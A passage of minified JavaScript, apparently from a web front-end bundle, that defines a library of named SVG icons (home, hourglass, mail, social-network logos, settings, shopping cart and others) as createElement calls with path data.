1.826 0l7.519-7.52a6.428 6.428 0 0 0 0-9.09Zm-4.169 1.285a1 1 0 1 0 0 2c.299 0 .595.114.822.341.323.323.46.76.41 1.183a1 1 0 0 0 1.986.234A3.43 3.43 0 0 0 18.5 7.5a3.156 3.156 0 0 0-2.236-.927Z",clipRule:"evenodd"})),hemicon_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h7.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hidden_hide_invisible_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.87 3.07a.75.75 0 0 1 1.06 1.061l-16.799 16.8a.75.75 0 0 1-1.06-1.06l1.857-1.859c-1.397-1.145-2.487-2.454-3.25-3.516a20.19 20.19 0 0 1-1.255-1.985 9.52 9.52 0 0 1-.067-.127l-.025-.049a.758.758 0 0 1 0-.673l.015-.03.016-.03.016-.03.007-.014a18.243 18.243 0 0 1 .72-1.217A20.435 20.435 0 0 1 3.33 7.486c1.938-2.067 4.873-4.237 8.672-4.238 2.269 0 4.231.778 5.852 1.84L19.87 3.07ZM8.874 14.067A3.73 3.73 0 0 1 8.25 12 3.75 3.75 0 0 1 12 8.25a3.73 3.73 0 0 1 2.066.624l-5.192 5.192Zm11.657-6.405c.205.008.397.1.533.253a20.672 20.672 0 0 1 1.933 2.583 17.693 17.693 0 0 1 .661 1.138l.01.019a.77.77 0 0 1 .004.68l-.016.03-.032.06-.007.014a18.22 18.22 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.224 2.855c-1.938 2.067-4.872 4.237-8.672 4.237a9.97 9.97 0 0 1-3.243-.545.752.752 0 0 1-.277-1.25l11.5-11.082.057-.05a.753.753 0 0 1 .493-.16Z",clipRule:"evenodd"})),home_house_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75h-3.5A1.75 1.75 0 0 1 13.75 20v-5a.25.25 0 0 0-.25-.25h-3a.25.25 0 0 0-.25.25v5a1.75 1.75 0 0 1-1.75 1.75H5A2.75 2.75 0 0 1 2.25 19v-8.1c0-.786.336-1.534.923-2.056l7-6.223a2.75 2.75 0 0 1 3.654 0l7 6.223a2.75 2.75 0 0 1 .923 2.056V19Z"})),hourglass_timer_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 1.25a.75.75 0 0 1 0 1.5h-1.25v4.18c0 .92-.46 1.778-1.225 2.288L13.352 12l4.173 2.782a2.75 2.75 0 0 1 1.225 2.288v4.18H20a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1 0-1.5h1.25v-4.18c0-.92.46-1.778 1.225-2.288L10.648 12 6.475 9.218A2.75 2.75 0 0 1 5.25 6.93V2.75H4a.75.75 0 0 1 0-1.5h16ZM13.75 16.5a.75.75 0 0 0-.75-.75h-2a.75.75 0 0 0 0 1.5h2a.75.75 0 0 0 .75-.75Zm.75 2.25a.75.75 0 0 1 0 1.5h-5a.75.75 0 0 1 0-1.5h5Z",clipRule:"evenodd"})),instagram_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9 12a3 3 0 1 1 6 0 3 3 0 0 1-6 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm12.5 5.5a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Z",clipRule:"evenodd"})),laptop_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.75 15.25V6A2.75 2.75 0 0 1 5.5 3.25h13A2.75 2.75 0 0 1 21.25 6v9.25H2.75ZM13.5 6a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3ZM1.25 18v-1.25h21.5V18A2.75 2.75 0 0 1 20 20.75H4A2.75 2.75 0 0 1 1.25 18Z",clipRule:"evenodd"})),left_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18ZM11 20a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h8Zm10-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18ZM11 8a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h8Z"})),left_triangle_angle_arrow_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.75 19c0 1.442-1.646 2.265-2.8 1.4l-9.333-7a1.75 1.75 0 0 1 0-2.8l9.333-7c1.154-.865 2.8-.042 2.8 1.4v14Z"})),linkedin_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm11.15 16.792h2.893v-5.945c0-2.515-1.425-3.731-3.417-3.731-1.992 0-2.83 1.552-2.83 1.552V9.652h-2.79v9.389h2.79v-4.929c0-1.32.607-2.106 1.77-2.106 1.07 0 1.584.755 1.584 2.106v4.929ZM4.96 6.69c0 .957.77 1.732 1.72 1.732s1.719-.775 1.719-1.732-.77-1.733-1.72-1.733S4.96 5.733 4.96 6.69Zm3.188 12.35H5.24V9.654h2.908v9.389Z",clipRule:"evenodd"})),link_chains_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.264 9.281a1 1 0 0 1 1.415 1.415L5.165 13.21a3.977 3.977 0 1 0 5.625 5.625l2.514-2.514a1 1 0 0 1 1.415 1.414l-2.515 2.514a5.977 5.977 0 1 1-8.453-8.453L6.264 9.28Zm5.532-5.53a5.977 5.977 0 1 1 8.453 8.453l-2.514 2.515a1 1 0 0 1-1.414-1.415l2.514-2.514a3.977 3.977 0 1 0-5.625-5.625l-2.514 2.514a1.001 1.001 0 0 1-1.415-1.414l2.515-2.514Z"}),(0,a.createElement)("path",{d:"M13.793 8.793a1 1 0 1 1 1.414 1.414l-5 5a1 1 0 0 1-1.414-1.414l5-5Z"})),location_gps_map_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.625 22.65 12 22l.375.65a.75.75 0 0 1-.75 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.625 22.65 12 22c.375.65.376.649.376.649l.002-.001.006-.004.02-.012.034-.02.04-.024a19.765 19.765 0 0 0 1.212-.814 22.44 22.44 0 0 0 2.847-2.456c2.058-2.11 4.213-5.239 4.213-9.113 0-4.928-3.9-8.955-8.75-8.955s-8.75 4.027-8.75 8.955c0 3.874 2.155 7.002 4.213 9.113a22.436 22.436 0 0 0 3.788 3.101 12.961 12.961 0 0 0 .344.213l.021.012.006.004.003.001ZM12 6.25a3.75 3.75 0 1 0 0 7.5 3.75 3.75 0 0 0 0-7.5Z",clipRule:"evenodd"})),long_arrow_up_top_increase_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 21V10H6a1 1 0 0 1-.707-1.707l6-6 .076-.068a1 1 0 0 1 1.338.068l6 6A1 1 0 0 1 18 10h-5v11a1 1 0 1 1-2 0Z"})),mail_email_messege_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v12A2.75 2.75 0 0 0 4 20.75h16A2.75 2.75 0 0 0 22.75 18V6A2.75 2.75 0 0 0 20 3.25H4ZM6.6 7.2a1 1 0 1 0-1.2 1.6l4.8 3.6a3 3 0 0 0 3.6 0l4.8-3.6a1 1 0 0 0-1.2-1.6l-4.8 3.6a1 1 0 0 1-1.2 0L6.6 7.2Z",clipRule:"evenodd"})),media_document_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.25 19V5A2.75 2.75 0 0 1 5 2.25h10.172c.73 0 1.429.29 1.944.806l3.828 3.828a2.75 2.75 0 0 1 .806 1.944V19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19ZM15 15.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2-7a1 1 0 0 0-1-1H8a1 1 0 0 0 0 2h4a1 1 0 0 0 1-1Zm4 3.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h8a1 1 0 0 0 1-1Z"})),messege_comment_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 16A2.75 2.75 0 0 1 20 18.75H7.264l-4.795 3.836A.75.75 0 0 1 1.25 22V7A2.75 2.75 0 0 1 4 4.25h16A2.75 2.75 0 0 1 22.75 7v9ZM14 9.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9ZM14 8.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v9A2.75 2.75 0 0 0 4 17.75h3.75V21a.75.75 0 0 0 1.219.586l4.794-3.836H20A2.75 2.75 0 0 0 22.75 15V6A2.75 2.75 0 0 0 20 3.25H4ZM9 10a1 1 0 0 0-2 0v1a1 1 0 1 0 2 0v-1Zm3-1a1 1 0 0 1 1 1v1a1 1 0 1 1-2 0v-1a1 1 0 0 1 1-1Zm5 1a1 1 0 1 0-2 0v1a1 1 0 1 0 2 0v-1Z",clipRule:"evenodd"})),messege_comment_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9Z"})),messege_comment_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.75 12A9.75 9.75 0 0 1 12 21.75H3a.75.75 0 0 1-.75-.75v-9c0-5.385 4.365-9.75 9.75-9.75s9.75 4.365 9.75 9.75ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 3.25A5.75 5.75 0 0 1 22.75 9v7a.75.75 0 0 1-.75.75h-5.31a4.75 4.75 0 0 1-4.69 4H2a.75.75 0 0 1-.75-.75v-6a4.751 4.751 0 0 1 4-4.691V9A5.75 5.75 0 0 1 11 3.25h6ZM5.25 10.838A3.25 3.25 0 0 0 2.75 14v5.25H12a3.25 3.25 0 0 0 3.162-2.5H11A5.75 5.75 0 0 1 5.25 11v-.162ZM11 10.75a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-6Zm0-3.5a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-4Z",clipRule:"evenodd"})),messege_comment_7_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 11.5c0 5.218-4.932 9.25-10.75 9.25-.921 0-1.817-.101-2.672-.29l-2.956 1.691A.75.75 0 0 1 5.25 21.5v-2.8c-2.411-1.675-4-4.258-4-7.2 0-5.218 4.932-9.25 10.75-9.25s10.75 4.032 10.75 9.25ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2 2.5a1 1 0 1 1 0 2h-4a1 1 0 1 1 0-2h4Z",clipRule:"evenodd"})),messege_comment_8_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 3.25c4.542 0 8.25 3.613 8.25 8.102 0 2.519-1.172 4.764-3 6.247V20a.75.75 0 0 1-1.163.626l-2.13-1.404a8.41 8.41 0 0 1-1.957.231 8.323 8.323 0 0 1-4.61-1.382 7.867 7.867 0 0 1-3.075-.06l-1.82 1.127A.75.75 0 0 1 3.85 18.5v-1.87c-1.576-1.222-2.6-3.07-2.6-5.157C1.25 7.7 4.557 4.75 8.5 4.75c.319 0 .634.02.942.057a.755.755 0 0 1 .15.033A8.318 8.318 0 0 1 14.5 3.25ZM8.08 6.265c-3.03.195-5.33 2.505-5.33 5.208 0 1.68.878 3.196 2.276 4.162a.75.75 0 0 1 .324.617v.903l.943-.583a.75.75 0 0 1 .587-.086c.45.12.925.188 1.416.203A7.98 7.98 0 0 1 8.08 6.265Z",clipRule:"evenodd"})),messenger_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M1.25 11.677C1.25 5.687 5.945 1.25 12 1.25s10.75 4.44 10.75 10.43c0 5.99-4.695 10.427-10.75 10.427a11.75 11.75 0 0 1-3.112-.414.864.864 0 0 0-.575.043l-2.134.94a.86.86 0 0 1-1.207-.76l-.059-1.913a.85.85 0 0 0-.288-.613c-2.09-1.87-3.375-4.58-3.375-7.713Zm7.452-1.959-3.157 5.01c-.304.48.287 1.02.739.677l3.391-2.575a.644.644 0 0 1 .777-.003l2.513 1.884a1.612 1.612 0 0 0 2.332-.43l3.161-5.006c.301-.481-.29-1.024-.742-.68l-3.391 2.574a.644.644 0 0 1-.777.003l-2.513-1.884a1.613 1.613 0 0 0-2.333.43Z",clipRule:"evenodd"})),microsoft_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.25 2.25v9h-9V5A2.75 2.75 0 0 1 5 2.25h6.25Zm1.5 0v9h9V5A2.75 2.75 0 0 0 19 2.25h-6.25Zm9 10.5h-9v9H19A2.75 2.75 0 0 0 21.75 19v-6.25Zm-10.5 9v-9h-9V19A2.75 2.75 0 0 0 5 21.75h6.25Z"})),middle_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm-5 18a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h8Zm5-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm-5-6a1 1 0 1 1 0 2H8a1 1 0 0 1 0-2h8Z"})),mobile_smartphone_phone_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 22.75A2.75 2.75 0 0 0 19.75 20V4A2.75 2.75 0 0 0 17 1.25H7A2.75 2.75 0 0 0 4.25 4v16A2.75 2.75 0 0 0 7 22.75h10ZM13.5 4a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"})),pause_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 5A2.75 2.75 0 0 1 5 2.25h2.5A2.75 2.75 0 0 1 10.25 5v14a2.75 2.75 0 0 1-2.75 2.75H5A2.75 2.75 0 0 1 2.25 19V5Zm11.5 0a2.75 2.75 0 0 1 2.75-2.75H19A2.75 2.75 0 0 1 21.75 5v14A2.75 2.75 0 0 1 19 21.75h-2.5A2.75 2.75 0 0 1 13.75 19V5Z",clipRule:"evenodd"})),pinterest_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 4.554 2.833 8.448 6.832 10.014-.094-.85-.178-2.159.038-3.087.195-.84 1.26-5.344 1.26-5.344s-.321-.644-.321-1.596c0-1.495.866-2.61 1.945-2.61.917 0 1.36.688 1.36 1.514 0 .922-.587 2.301-.89 3.579-.254 1.07.536 1.943 1.592 1.943 1.91 0 3.379-2.015 3.379-4.923 0-2.574-1.85-4.374-4.49-4.374-3.06 0-4.855 2.295-4.855 4.665 0 .925.356 1.915.8 2.454.088.106.101.2.075.308-.082.34-.263 1.07-.298 1.22-.047.196-.156.238-.36.143-1.343-.625-2.182-2.588-2.182-4.165 0-3.39 2.464-6.505 7.103-6.505 3.729 0 6.627 2.657 6.627 6.209 0 3.705-2.336 6.686-5.578 6.686-1.09 0-2.114-.566-2.464-1.234 0 0-.54 2.053-.67 2.555-.243.934-.898 2.105-1.336 2.819A10.76 10.76 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Z"})),play_media_video_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.936 0 10.75-4.813 10.75-10.75S17.936 1.25 12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75ZM10.416 7.376A.75.75 0 0 0 9.25 8v8a.75.75 0 0 0 1.166.624l6-4a.75.75 0 0 0 0-1.248l-6-4Z",clipRule:"evenodd"})),price_tag_label_category_sale_discount_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.444 13.616a2.75 2.75 0 0 0 .806-1.944V3.5a1.75 1.75 0 0 0-1.75-1.75h-8.172c-.73 0-1.429.29-1.945.806l-8 8a2.75 2.75 0 0 0 0 3.888l7.172 7.172a2.75 2.75 0 0 0 3.889 0l8-8ZM8.707 12.293a1 1 0 1 0-1.414 1.414l3 3 .076.068a1 1 0 0 0 1.406-1.406l-.068-.076-3-3ZM18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),price_tag_offer_sale_coupon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18.796 6.963c-.367 1.048-1.172 1.993-2.432 2.693a.75.75 0 1 1-.728-1.311c.99-.55 1.517-1.229 1.744-1.878a2.583 2.583 0 0 0-.1-1.941c-.55-1.208-1.999-2.11-3.853-1.618-2.791.74-6.15 1.333-9.695-.024a.75.75 0 1 1 .536-1.401c3.09 1.183 6.062.695 8.774-.025 2.566-.68 4.75.577 5.603 2.445.425.933.517 2.017.151 3.06Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.74 7.294c-.46 1.313-1.45 2.436-2.89 3.236a1.75 1.75 0 1 1-1.7-3.06c.81-.45 1.152-.95 1.286-1.333a1.59 1.59 0 0 0-.066-1.197 1.835 1.835 0 0 0-.101-.19h-4.44c-.73 0-1.43.29-1.945.805l-6.5 6.5a2.75 2.75 0 0 0 0 3.89l6.171 6.171a2.75 2.75 0 0 0 3.89 0l6.5-6.5a2.75 2.75 0 0 0 .805-1.944V6.5c0-.598-.3-1.127-.759-1.442.083.73.01 1.49-.252 2.236Zm-8.71 5.176a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06-1.06l-2-2Zm-2.5 1.5a.75.75 0 0 0-1.06 1.06l3 3a.75.75 0 0 0 1.06-1.06l-3-3Z",clipRule:"evenodd"})),reddit_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M13.875 4.75h2.354a2.751 2.751 0 1 0 0-1.5h-2.354A2.75 2.75 0 0 0 11.125 6v2.028c-1.76.115-3.39.571-4.771 1.281a2.875 2.875 0 1 0-3.964 4.109A5.777 5.777 0 0 0 2 15.5C2 19.642 6.477 23 12 23s10-3.358 10-7.5c0-.722-.136-1.421-.39-2.082a2.875 2.875 0 1 0-3.963-4.109C16.2 8.566 14.48 8.1 12.624 8.014V6c0-.69.56-1.25 1.25-1.25ZM9 14.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm0 2.97a.75.75 0 0 0-1.06 1.06c.954.955 2.57 1.345 4.03 1.345 1.46 0 3.075-.39 4.03-1.345a.75.75 0 0 0-1.06-1.06c-.546.545-1.68.905-2.97.905-1.29 0-2.424-.36-2.97-.905ZM16.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),refresh_reset_cycle_loop_infinity_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 21v-5a1 1 0 0 1 1-1h5a1 1 0 1 1 0 2H5.756A7.977 7.977 0 0 0 12 20a8 8 0 0 0 8-8 1 1 0 1 1 2 0c0 5.523-4.477 10-10 10a9.967 9.967 0 0 1-7-2.863V21a1 1 0 1 1-2 0Zm-1-9C2 6.477 6.477 2 12 2a9.966 9.966 0 0 1 7 2.86V3a1 1 0 1 1 2 0v5a1 1 0 0 1-1 1h-5a1 1 0 1 1 0-2h3.245A8 8 0 0 0 4 12a1 1 0 1 1-2 0Z"})),restriction_no_stop_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM6.383 19.03A9 9 0 0 0 19.03 6.383L6.383 19.03ZM12 3a9 9 0 0 0-7.031 14.616L17.616 4.97A8.96 8.96 0 0 0 12 3Z",clipRule:"evenodd"})),right_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm0 18a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Zm0-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm0-6a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Z"})),right_triangle_angle_play_arrow_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.25 5c0-1.442 1.646-2.265 2.8-1.4l9.334 7c.933.7.933 2.1 0 2.8l-9.334 7c-1.154.865-2.8.042-2.8-1.4V5Z"})),search_magnify_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M16.618 18.032a9 9 0 1 1 1.414-1.414l3.675 3.675a1 1 0 0 1-1.414 1.414l-3.675-3.675ZM4 11a7 7 0 1 1 12.042 4.856 1.006 1.006 0 0 0-.186.186A7 7 0 0 1 4 11Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M10 6.5a1 1 0 0 1 1-1 5.5 5.5 0 0 1 5.5 5.5 1 1 0 1 1-2 0A3.5 3.5 0 0 0 11 7.5a1 1 0 0 1-1-1Z",clipRule:"evenodd"})),settings_tool_function_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.183 2.612a1.75 1.75 0 0 0-1.706-1.362h-2.953a1.75 1.75 0 0 0-1.706 1.362l-.355 1.562a1.25 1.25 0 0 1-1.587.918L5.25 4.59a1.75 1.75 0 0 0-2.021.782L1.772 7.837a1.75 1.75 0 0 0 .338 2.193l1.16 1.04a1.25 1.25 0 0 1 0 1.862L2.11 13.97a1.75 1.75 0 0 0-.337 2.193l1.455 2.464a1.751 1.751 0 0 0 2.021.783l1.628-.5a1.25 1.25 0 0 1 1.586.917l.355 1.56a1.75 1.75 0 0 0 1.707 1.363h2.952a1.75 1.75 0 0 0 1.706-1.362l.355-1.56a1.25 1.25 0 0 1 1.586-.919l1.628.501a1.75 1.75 0 0 0 2.02-.783l1.457-2.464a1.75 1.75 0 0 0-.34-2.193l-1.157-1.038a1.25 1.25 0 0 1 0-1.863l1.159-1.039a1.75 1.75 0 0 0 .338-2.193l-1.456-2.464a1.75 1.75 0 0 0-2.02-.782l-1.629.5a1.25 1.25 0 0 1-1.586-.917l-.355-1.562ZM15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z",clipRule:"evenodd"})),share_social_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m9.075 9.42 5.865-2.933a3.45 3.45 0 1 1 1.005 1.734l-5.976 2.988a3.915 3.915 0 0 1 0 1.583l5.976 2.987a3.45 3.45 0 1 1-1.005 1.734L9.074 14.58a3.9 3.9 0 1 1 0-5.16Z",clipRule:"evenodd"})),shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9.75 19.25a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm9.75 0a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm1.5 0a2.5 2.5 0 1 1-4.79-1h-5.17a2.5 2.5 0 1 1-4.33-.442 1.745 1.745 0 0 1-.572-1.069L4.376 